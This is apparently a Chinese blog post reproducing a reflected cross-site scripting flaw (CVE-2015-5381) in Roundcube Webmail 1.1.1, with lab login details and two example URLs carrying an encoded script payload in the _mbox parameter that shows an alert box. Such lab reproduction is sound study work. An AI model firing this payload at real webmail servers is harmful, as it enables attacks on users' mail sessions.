Preface

Software: https://roundcube.net/
Versions: 1.1.x<1.1.2
CVE: CVE-2015-5381
Author: sroesemann
Release date: 2015-5-30

Reference

Roundcube Webmail跨站脚本漏洞(CNVD-2017-08082)

XSS via _mbox-parameter in Roundcube v.1.1.1

环境搭建

请参考:CentOS6 安装Sendmail + Dovecot + Roundcubemail

漏洞复现

需要有效的账号密码才能触发:user1/123456

本地环境:http://mail.roundcube.com/roundcubemail-1.1.1/

Example:

https://{YOURSERVER}/?_task=mail&_mbox=INBOX%22%3E%3Cscript%3Ealert(%22Roundcube+v1.1.1+XSS%22)%3C%2Fscript%3E
http://mail.roundcube.com/roundcubemail-1.1.1/?_task=mail&_mbox=INBOX%22%3E%3Cscript%3Ealert(%22Roundcube+v1.1.1+XSS%22)%3C%2Fscript%3E

XSS触发...

最新文章

  1. [课程设计]Scrum 1.3 多鱼点餐系统开发进度
  2. [MySQL] 高可用架构MMM简单介绍
  3. html之间的传值
  4. salesforce 零基础学习(十九)Permission sets 讲解及设置
  5. SAP 录屏BDC使用—实例
  6. Scala Trait
  7. C++ STL中vector的内存机制和性能分析
  8. Spring之ResourceLoader加载资源
  9. bzoj1346: [Baltic2006]Coin
  10. c#使用XSLT将xml文档转换为html文档
  11. Leetcode-34-Search for a Range-(Medium)
  12. SVN的使用说明
  13. Typescript 和 Javascript之间的区别
  14. Promise的一点感悟~
  15. Fiddler抓取https数据包
  16. python基础之循环语句,格式化输出以及编码
  17. 最新证明面临质疑:P/NP问题为什么这么难?
  18. ES6里新添加了两个很好用的东西,set和Array.from。
  19. Windows 7系统启动MongoDB失败解决办法?
  20. Springboot + Vue + shiro 实现前后端分离、权限控制

热门文章

  1. Linux之解决你的网络问题
  2. Linux多线程实践(4) --线程特定数据
  3. DBA Scripts
  4. Redis简介 Linux安装Redis Redis使用
  5. MinerBean.java 数据库表 miner bean
  6. 迭代器模式之看芒果台还是央视nie?
  7. (NO.00001)iOS游戏SpeedBoy Lite成形记(二十六)
  8. Python学习笔记 - 高阶函数
  9. 2、Libgdx配置你的开发环境(Eclipse,Intellij IDEA,NetBeans)
  10. VS2008中开发手持终端程序(PDA软件)总结